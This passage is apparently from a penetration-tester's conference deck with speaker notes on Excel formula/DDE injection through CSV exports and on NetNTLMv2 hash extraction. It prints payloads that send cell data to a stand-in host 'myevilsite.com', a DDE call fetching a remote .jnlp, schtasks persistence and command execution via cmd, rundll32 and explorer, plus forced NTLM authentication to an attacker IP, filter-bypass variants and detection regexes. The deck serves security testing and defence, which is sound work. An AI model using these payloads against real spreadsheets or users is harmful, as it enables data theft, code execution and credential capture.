  • 33. 33 That CMD.EXE warning Built-in Excel functions • Steal data =HYPERLINK("http://myevilsite.com/?d="&A1,"Click here") • Limited info about the system e.g. current directory =INFO("DIRECTORY"), Excel version =INFO("RELEASE") • =WEBSERVICE(URL) • Sadly doesn’t support authentication (i.e. force NTLM authentication) • Or file paths (local or UNC) or file:// • But it will steal data without user interaction (unlike HYPERLINK) =WEBSERVICE("http://myevilsite.com/?data="&A1) • =FILTERXML(XML, XPATH) • Any XXE or parsing bugs?
  • 34. 34 Alternatives to cmd.exe • =powershell|'Test-Connection 127.0.0.1'!A0 Using 8.3 names doesn’t work as Excel doesn’t like ~ in the formula =cmd|'/k powershell Test-Connection 127.0.0.1'!A0 PATHEXT environment variable ignored – .exe only • .exe files in PATH where filename <= 12 characters =explorer|'https://nccgroup.trust'!A0 =schtasks|'/create /sc DAILY /tn WindowsUpdate /tr calc.exe'!A0 =javaws|'http://myevilsite.com/malware.jnlp'!A0 =rundll32|'shell32.dll,ShellExec_RunDLL calc.exe'!A0 • N.B. if Excel is 32-bit, then the program will be run as such, etc.
  • 35. 35 Native DDE services – 1/2 Tcl (Tool Command Language) • dde services "" "" {Excel {[Book1]Sheet1}} {Excel {[Book1]Sheet2}} {Excel {[Book1]Sheet3}} {Excel System} {PROGMAN PROGMAN} {Shell AppProperties} {Folders AppProperties} {PROGMAN PROGMAN} Excel • dde request excel Sheet1 r1c1:r2c3 • dde execute excel Sheet1 {[formula("overwrite","r1c1")]} • dde execute excel Sheet1 {[alert("hello")][alert("world")]} • dde execute excel Sheet1 {[file.delete("e:test")]} • dde execute excel Sheet1 {[exec("c:windowssystem32calc.exe")]} 
  • 36. 36 Native DDE services – 2/2 Progman • dde execute progman progman {[AddItem(calc.exe,Microsoft Word)]} Folders / Shell • dde execute Folders AppProperties {[ViewFolder("","attacker_IPc$",2)]} What about in Excel? • This could save you hours: when testing, if Excel hangs, try closing Tcl • =Folders|AppProperties!'{[ViewFolder("","c:windows",1)]}'  • That Tcl Service-Topic list wasn’t complete…
  • 37. 37 DDESpy • Part of Visual Studio 6 (!) • Must be running when application launches
  • 38. 38 iexplore DDE • =iexplore|WWW_OpenURL!nccgroup.com • No “remote data not accessible” warning  • Slice of BeEF anyone? • =iexplore|WWW_OpenURL!'<attacker_IP>c$' (force network authentication) • =iexplore|WWW_OpenURL!'c:windowssystem32cmd.exe' • No better than where we were really! • No obvious way to include switches anyway – a limitation of file://
  • 40. 40 Demo (1) No Protective View warning as CSV (2) Just “Enable Content” warning as DDE call succeeded • Background navigation to phishing site could be very effective (3) No warnings – exactly which stars were aligned there?! • A file with same name previously downloaded • Had content to elicit warnings, which were accepted • So it’s now “trusted” • Previous file need not have been malicious – remember =NotASheet!A1 • Malicious file’s start-up prompt set to auto-update links
  • 41. 41 Lessons From CSV to CMD • Check out any Excel export that returns user-supplied data • CSV is not a benign format • DDE ≠ macro • In some cases it may be possible to cut down the Excel warnings • Excel may have more to give in this area • Progman|Shell|Folders attractive DDE targets as always running • Very much work in progress – please explore! • All this stuff applies to red-teaming too From CMD to qwerty • Use or develop test cases i.e. something you know should work • Read the errors! • “Authoritative” references can go stale
  • 42. 42 Defence Original article • Prefix = with ' • This will “cast” the cell as text in XLS[X] and stop execution in CSV +cmd|'/k ipconfig'!A0-cmd|'/k ipconfig'!A0 =cmd|'/k ipconfig'!A0 @SUM(cmd|'/k ipconfig'!A0) "=cmd|'/k ipconfig'!A0" ""=cmd|'/k ipconfig'!A0 =(cmd|'/k ipconfig'!A0) =0-cmd|'/k ipconfig'!A0 • Validation against a strict whitelist of “known good” (length, characters, format) should always be the go-to defensive strategy • Otherwise e.g. for XLS[X] consider always prefixing cell with apostrophe
  • 43. 43 References DDE • https://www.tcl.tk/man/tcl8.6/TclCmd/dde.htm (Tcl) • http://rpackages.ianhowson.com/rforge/tcltk2/man/windows/tk2dde.html (examples) • https://support.microsoft.com/en-us/kb/128185 (Excel XLM reference) Hashcat test cases • http://hashcat.net/wiki/doku.php?id=example_hashes Catflap • https://github.com/nccgroup/ (or https://github.com/exploresecurity/catflap) NTLM deep-dive • http://davenport.sourceforge.net/ntlm.html • http://ubiqx.org/cifs/SMB.html#SMB.8 • http://www.innovation.ch/personal/ronald/ntlm.html • http://hashcat.net/forum/archive/index.php?thread-2011.html • https://msdn.microsoft.com/en-us/library/cc207842.aspx
  • 44. 44 Appendix 1: NetNTLMv2 from PCAP Challenge tshark -Y "ntlmssp.messagetype == 0x00000002" -T fields -e ntlmssp.ntlmserverchallenge Domain tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.auth.domain Username tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.auth.username HMAC-MD5 tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.ntlmv2_response | sed 's/://g' | cut -c 1-32 Blob tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.ntlmv2_response | sed 's/://g' | cut -c 33-
  • 45. 45 Appendix 2: NetNTLMv2 calculations 1. NTHASH = MD4(Unicode password) echo -n $2 | iconv -f ascii -t utf16 | tail -c +3 | openssl dgst -md4 – binary | xxd –p 2. INTHASH = HMAC-MD5(Unicode uppercase username | Unicode domain, NTHASH) echo -n ${USERNAME^^}$DOMAIN | iconv -f ascii -t utf16 | tail -c +3 | openssl dgst -md5 -mac HMAC -macopt hexkey:$NTHASH –binary | xxd –p 3. HMAC = HMAC-MD5(Challenge | blob, INTHASH) echo -n $CHALLENGE$BLOB | xxd -r –p | openssl dgst -md5 -mac HMAC - macopt hexkey:$INTHASH –binary | xxd -p
  • 46. 46 fin You have been watching… Jerome @exploresecurity Script passable Hair needs cutting Make-up required Costume is about the right word Tip of the hat to James @albinowax Cara @bones_codes Michael Roberts Andy @ZephrFish Raquel Alvarez

Editor's Notes

  • #2: For SlideShare NB: May not look nice in places due to animations etc. I’ve made a few post-presentation edits to help with clarity and address questions I had
  • #5: None of this would normally be difficult Onsite internal test, no pentest laptop Corporate machines, locked-down users Gotchas and bugs when cracking hashes
  • #7: Just a snippet Essentially the entire Excel file was sent up, not just cell contents but presentation data, to come back down again!
  • #8: In fact it did work as a GET Incorrect content-type could yield XSS but spoiled by Content-Disposition Cache-control Report may include sensitive data May not be cached due to other headers like Content-Disposition (without this Content-Type plays a role – in this case it would be cached due to text/html but application/vnd.ms-excel for .xls or application/vnd.openxmlformats-officedocument.spreadsheetml.sheet for xlsx less certain – browser-dependent?) Even apps that have good caching headers can fall down on file download (because these requests not processed in same way, e.g. it’s a static file returned by server not application)
  • #9: Request with all possible single byte values
  • #10: Everything except the null byte came back Scope for a request that would return a malicious exploit-payload Just a curiosity – OS command execution could be achieved much more simply…
  • #11: James Kettle, PortSwigger DDE call Cell reference is not required, could be anything (cells are used when data source is another Excel sheet) Imagine e.g. program=“shares”, topic=“LSE”, item=“NCC” It’s because the DDE call fails that Excel offers to run cmd.exe
  • #12: First warning is particular to this example as the simplest payload made an XLS file that wasn’t in XLS format CMD.EXE might raise an eyebrow Other warnings may follow, by this time the payload has run
  • #13: Okay, proof of concept, but not very exciting…
  • #14: Being inside makes those creds immediately valuable
  • #15: No particular reason for choosing John - I knew the username and password, it was mine! NETNTLMv2 is a constant
  • #16: Steps are a bit like SSL/TLS handshake NTLM weak as third DES key is padded with 5 NULL bytes
  • #17: Workstation domain, name and build are all in fact optional Can be used by the server to determine whether the client is eligible for local authentication NTLM Security Support Provider (SSP) The Window SSP Interface (SSPI) framework specifies a core set of security functionality that is implemented by supporting providers such as NTLMSSP The Microsoft equivalent of the GSS-API (Generic Security Service Application Program Interface, RFC 2743) The SSPI specifies, and the NTLMSSP implements, the core operations of authentication, integrity, and confidentiality services
  • #18: OS also Windows 7 here as attacker’s machine was a client workstation In Negotiate Flags, Target Type bits describe what Target Name is – share / server / domain Info leak: NetBIOS, DNS and workstation names but since server is me, not interesting!
  • #20: No LM – as you’d expect from default Windows 7 The first “NTLM client challenge” is used for LMv2 Client challenge a feature of NTLMv2 not NTLM
  • #21: Older version of Wireshark names the HMAC field differently e.g. “HMAC”!
  • #22: Onsite time was ending but I didn’t need to be onsite to keep trying…
  • #24: John Stuart Mill – English philosopher 1843 book “A System of Logic” included Mill’s methods – codified scientific approach to causation (technically “induction” as opposed to “deduction” – the former is probable cause, the latter is certain)
  • #26: For recalculation, catflap can take an ordinary hashcat file as well as a Wireshark pcap
  • #27: When editing blog, be careful not to remove half a byte (1 byte = 2 hex chars!) Footnote (1): only found out that Linux wasn’t affected while preparing demo – ha ha! That was another difference back on the hashcat slide – go JS Mill!
  • #28: I’ll be loosely switching between web app Excel export and red-team scenarios
  • #29: (1) because it’s come from internet location (2a) first encounter – creates registry entry to be “trusted” (2b) when trusted but links not autoupdated (3) because DDE call fails More warnings may follow after payload launches
  • #30: Piranha = NCC phishing platform Jobs where users had to accept Excel warning(s) Note that these jobs used spreadsheets laced with macros – this is different to DDE – but it’s clicking through warnings that’s of interest here Clearly we didn’t know what the user experience was in terms of warnings but the fact there was a difference between opened spreadsheets and macros run shows that some further step must have been necessary Internal Excel files often contain macros, especially within areas such as finance – users are habituated to the warnings, or the warnings may have been disabled!
  • #31: Like a packet with the evil bit set to off! Only once the Enable Content warning has been accepted does this setting make a difference =NotASheet!A1 is enough to prompt Enable Content security warning but doesn’t do anything suspicious Probably might as well hit them with everything in one go – certainly when time is limited in a test Trust Center “Workbook Links” are links to data in another workbook https://support.office.com/en-gb/article/Block-or-unblock-external-content-in-Office-documents-10204ae0-0621-411f-b0d6-575b0847a795 https://support.microsoft.com/en-us/kb/826921
  • #32: Part of Trust Center but not visible through the UI Entry in registry doesn’t require users to save the file Protected View approval registered immediately Enable content approval registered once CMD warning answered (can be “no”) Full binary value meaning? Trusted Locations are default areas, nothing useful without prior access Attack scenario: user input influences filename or application always names the file the same way Browsers may be configured to auto-download in which case they will append numbers to stop accidental overwrite  If no filename in Content-Disposition then FF will name file by the page in the URI + an extension based on Content-Type e.g. export.asp.xls so this would produce same filename
  • #33: Although CSV no PV, the EC warning means it can be trusted in registry Invalid XLSX not tolerated Excel 2010 vs 2013 no real difference URI extension: doesn’t matter if request is for .xls or .asp etc Content-Type / Content-Disposition filename dominant But text/csv not recognised so only if URI is .csv will it be opened correctly, otherwise e.g. .asp will fail Document opened inline vs saved & opened from disk If inline, URI must end CSV, otherwise similar to above Invalid XLS format 1,2,3,=cmd|'/k ipconfig'!A3 Valid XLS formats =cmd|'/k ipconfig'!A3 1 2 3 =cmd|'/k ipconfig'!A3 1 2 3 =cmd|'/k ipconfig'!A3
  • #34: Can we get rid of or soften that CMD.EXE warning?
  • #35: Tried =powershell in Excel 2010 (32-bit), 2013 (32-bit), 2016 (64-bit) Tilde means next character is a literal e.g. in Find, but can’t be escaped in formula with ~~ or \~ etc ??? Not many files have 8.3 alternative anyway Find files < 8 chars plus .exe by powershell "cmd /c dir *.exe /b |? {$_.length -lt 13}" explorer will open default browser Java Web Start – may be disabled anyway but fun!
  • #36: Tcl first needs “package require dde” Data theft from sheet a little alarming, although something malicious would already have to be running You can overwrite cells of the spreadsheet that you can’t otherwise influence using the web app Use of Alert vs MsgBox -> XLM macro language in Excel 4.0 before VBA (old help file in reference at end) Alert also demonstrates multiple statements i.e. [macro 1][macro 2] Exec didn’t work  or fopen
  • #37: Documentation on DDE interfaces poor – I was Googling so much, Google thought I was a robot! Progman manipulates shortcuts in Start | All Programs Screenshot of typing “word” into Start search menu Can’t use DeleteItem to delete real Microsoft Word 2010 as link is in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office” which ordinary user can’t delete Folders instructs Windows Explorer (Shell interface unknown, seems to mirror Folders) The “2” minimises the window Doesn’t accept URL All 3 services seem to live in shell32.dll – is there a ShellFile topic? Clear out DDE channels from Excel https://social.technet.microsoft.com/Forums/office/en-US/7c8f845d-c4aa-4627-9008-3251d2772536/dde-links-crash-excel-2010-on-windows-7-64bits?forum=excel Dim i, ChannelNumber As Integer For i = 1 To 1000 Application.DDETerminate (i) Next i
  • #38: Strings C:\Windows\System32\ieframe.dll WWW_URLEcho WWW_OpenURL WWW_GetWindowInfo WWW_ShowFile WWW_OpenURL WWW_Exit WWW_Activate WWW_UnregisterURLEcho WWW_RegisterURLEcho WWW_UnregisterProtocol WWW_RegisterProtocol WWW_OpenURLNewWindow WWW_ListWindows C:\Program Files (x86)\Mozilla Firefox\xul.dll WWW_GetWindowInfo WWW_RegisterViewer WWW_UnRegisterViewer WWW_CancelProgress WWW_Version WWW_OpenURL WWW_Activate
  • #39: Only works if IE running
  • #40: Trailing / in URL important Note that only URL of active tab obtained
  • #42: With red-teaming, results may differ with emailing docs “From CMD to qwerty” - advice common to all tools not just password crackers The closer the test is to your unknown state, the better
  • #43: The @ was originally an alias for = to make life easy for converts from Lotus Notes SUM could also be COUNT, COS… Consider phone number – it may have a + at the front but so structured elsewhere that it can be well protected Prefixing with ' may break some numerical operations on that cell e.g. SUM but if you’re expecting a number than use whitelist; text functions should still work For CSV what about regex \W.+\|.+!.+ or \W[a-zA-Z\.]+\(.*\) Only if whitelisting can’t be done! First for DDE, second for Excel formula \W (capital) matches non-alphanumeric It’s unlikely “normal” input would match these
  • #44: Another good DDE reference (but beware ad clicks) http://www.angelfire.com/biz/rhaminisys/ddeapps.html#DDEExcelCrash
  • #46: (1) Unicode = UTF-16 little endian iconv adds 2-byte “Byte Order Mark” (BOM) FFFE – a magic number to signal little ending UTF-16 xxd -p takes STDIN and outputs ASCII hex (2) NTHASH is the key ${USERNAME^^} converts to upper case (3) INTHASH is the key
  • #47: Repeat question from audience